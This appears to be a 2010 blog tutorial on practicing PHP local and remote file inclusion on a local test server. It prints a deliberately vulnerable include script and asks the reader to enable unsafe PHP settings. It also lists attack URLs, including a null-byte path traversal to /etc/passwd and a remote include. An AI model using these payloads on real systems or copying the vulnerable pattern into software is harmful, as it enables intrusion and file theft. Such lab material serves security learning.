Playing around with Local and Remote file inclusions…

May 27, 2010 at 10:54 am (LFI / RFI, PHP, Programming, Security)

Hey all,

So with my recent research into web application security I have been playing around with local and remote file inclusions on my local web server ๐Ÿ˜‰ A couple of things to note so that when you perform an LFI or RFI it actually works.

1) Make sure magic quotes is off, so your able to include said files:

; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off

Otherwise you will get an error similar to this when trying to include files:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

That is magic quotes kicking in, make sure you turn it off before playing with these techniques!

2) Also you need to make sure allow_url_fopen and allow_url_include are set to on:

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as fil$
allow_url_include = On

Or you will get an error that looks similar to:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in /var/www/testing/vuln.php on line 5

Warning: include(http://www.google.com/) [function.include]: failed to open stream: no suitable wrapper could be found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

Now you should be able to play around with LFI/RFI with no issues, consider the following example:

root@bt:/var/www/testing# ls -l
total 16
-rw-r–r– 1 root root 33 May 27 10:48 blue.php
-rw-r–r– 1 root root 20 May 27 10:43 phpinfo.php
-rw-r–r– 1 root root 32 May 27 10:48 red.php
-rw-r–r– 1 root root 297 May 27 10:44 vuln.php
root@bt:/var/www/testing# cat vuln.php
<?php
$color = ‘blue’;
if (isset( $_GET[‘COLOR’] ) )
$color = $_GET[‘COLOR’];
include( $color . ‘.php’ );
?>

<form method=”get”>
<select name=”COLOR”>
<option value=”red”>red</option>
<option value=”blue”>blue</option>
</select>
<input type=”submit”>
</form>

root@bt:/var/www/testing# cat blue.php red.php
<?php echo “testing blue…”; ?>
<?php echo “testing red…”; ?>
root@bt:/var/www/testing#

Goto: http://localhost/testing/vuln.php then play around with the form for a bit (it shouldn’t take you too long, it’s a very simple and contrived example ๐Ÿ˜‰ ) and keep your eye on the variable in the URL bar… try things like this:

http://localhost/testing/vuln.php?COLOR=phpinfo.php
http://localhost/testing/vuln.php?COLOR=../../../../../etc/passwd%00
http://localhost/testing/vuln.php?COLOR=http://www.google.com/%00

Why the %00 on the end, you may ask?

Well that is to cause a NULL at the end of the string and for PHP to stop reading it at that point, otherwise something like this may happen:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

From that it should be pretty clear as to why you need to append the %00, notice the: ‘http://www.google.com/.php&#8217; which is constructed from:

include( $color . ‘.php’ );

$color == http://www.google.com/ . ‘.php’

As the page: http://www.google.com/.php does not exist, it throws an error. Which is why you must append a NULL to the end of your URL/File/String/Etc.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: